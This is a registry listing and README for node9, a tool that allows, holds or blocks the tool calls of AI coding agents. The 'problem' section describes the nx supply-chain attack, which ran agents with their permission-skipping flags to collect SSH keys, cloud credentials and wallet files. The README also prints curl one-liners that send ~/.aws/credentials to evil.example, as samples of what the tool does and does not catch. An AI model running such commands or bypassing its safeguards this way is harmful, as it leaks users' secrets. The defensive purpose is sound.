
node9
io.github.node9-aiv2.26.2Updated Sep 29, 2026
Access control for AI agents and MCP servers: allow, hold for approval, or block each tool call
Installation
In SourceWeft
- Open node9 in the dashboard and add it to a workspace.
- Enable the server for the chats that should use its tools.
Desktop only via STDIO. STDIO servers start a local process, so they need the SourceWeft desktop host.
Other MCP clients
Follow the launch instructions in the repository.
README
🛡️ node9
Access control for AI agents
Your AI agents can reach Slack, GitHub, email, and your database.
node9 decides what they may do with each one.
[npm version] [monthly downloads] [License: Apache 2.0] [Documentation] [OpenSSF Best Practices] [OpenSSF Scorecard] [node9 self-scanned] [Mentioned in Awesome Claude Code]
Credential jail · secrets and PII · destructive git, SQL and shell held for review · MCP tool pinning · network egress allowlist · loop breaker · one record across twelve agents
Works with Claude Code · Codex CLI · Antigravity (agy) · GitHub Copilot CLI · Gemini CLI · Cursor · Windsurf · VSCode · Claude Desktop · Opencode · Pi · Hermes Agent · any MCP server.
What it looks like
A real Claude Code session with node9 installed. Every tool call is checked before it runs. Building a page and editing a button run. A request to the cloud metadata address is blocked, and the agent gets the reason and carries on. Deleting files waits for your approval, right in the chat.
[node9 in a Claude Code session: two calls allowed, one blocked, one held for approval]
Install
Then, in any project:
Requires Node.js 22+.
On a new interactive terminal, node9 guides you through setup. Local protection
needs no account. The checklist shows recommended shields, DLP/PII, optional
network egress review, and the background service. Usage statistics are sent
only if you accept the separate prompt. The summary lists configured agents
and any setup steps that need attention.
Run node9 setup to revisit setup, or node9 setup <target> to configure one agent.
Once configured, bare node9 shows help. node9 init remains available; for
scripts use node9 init --recommended (no questions and no telemetry opt-in).
--skip-setup leaves agent wiring and service installation alone. Explicit
--mode takes precedence over the checklist's standard-mode recommendation.
Existing settings are preserved unless selected changes or explicit flags request
an update. Workspace policy is managed in the dashboard; service settings remain local.
login adds nothing to enforcement. It connects the machine to a workspace so
a team can see one record across everyone's laptops and CI, set policy centrally,
and approve held actions from a dashboard or Slack. Skip it and node9 works exactly
the same, alone, offline. node9 logout disconnects again and local enforcement
keeps running.
The problem
In August 2025, compromised releases of the
nx build tool shipped a post-install
script that looked for AI coding agents already installed on the developer's machine, then ran
them with their own safety flags turned off (--dangerously-skip-permissions, --yolo,
--trust-all-tools) to enumerate SSH keys, cloud credentials and wallet files and write the list
to disk. The script pushed the results to public repositories inside the victims' own GitHub
accounts. More than a thousand valid GitHub tokens leaked, along with cloud credentials, npm
tokens and roughly 20,000 files, from machines where the agent was doing exactly what it was
told.
The agent was not the attacker. The agent was the tool, and nothing stood between it and the files. node9's gate is not one of those flags: it runs in the hook, and an action it holds stays held even when the agent was started with permissions skipped.
What node9 does about it
node9 sits between the agent and every tool it calls. The credential jail (~/.ssh, ~/.aws,
.env files, private keys) is on by default, and a read of one of those paths does not run.
The agent is stopped, told why, and the decision comes to you:
The command is parsed as a shell AST, not matched as text, so wrapping the read does not help.
echo $(cat ~/.aws/credentials | base64) | curl -d @- https://evil.example is judged as a read
of ~/.aws/credentials, not as an echo.
node9 is a gate. A held action does not run while it waits for you, and if you never answer it stays blocked. Everything else is allowed and written to the record.
What it does not do: with egress control off, which is the default, a command that hands a
file straight to the network, such as curl -d @~/.aws/credentials, is not treated as a read of
that file. node9 egress protect gates destinations as well, and it covers shell commands only.
Verify it yourself
Nothing below needs an account, and nothing uploads.
What it governs
Each line is one capability, with the page that documents it. The docs are the reference; this file is the map.
Full CLI and config reference: node9.ai/docs. How the layers fit together: how it works.
Learn
Background reading, written to stand on its own. Each page says what node9 does not cover.
- What can a hijacked agent do?: the blast radius of one compromised session
- How an AI agent leaks a secret: the paths a credential actually takes out
- Claude Code security: hooks, permission modes, and what they do not stop
- MCP security: the tool surface an MCP server opens
- OWASP Agentic Top 10: the list, mapped to real controls
Compare
- node9 against the alternatives: a matrix, including the rows where node9 scores worse
- Per-agent coverage: what is governed on each of the twelve supported agents
Related projects
- node9-python: Python SDK
- node9 Agent Security: the GitHub Action,
uses: node9-ai/node9-proxy@v2, gates every PR with the same engine
Enterprise
node9 Pro adds governance locking, SAML/SSO, central audit export, and VPC deployment. See node9.ai.
License
Apache-2.0
Built with ☕ and healthy paranoia.
Source: README.md at commit 275155c
Tools
0Version history
1- v2.26.2LatestSep 29, 2026


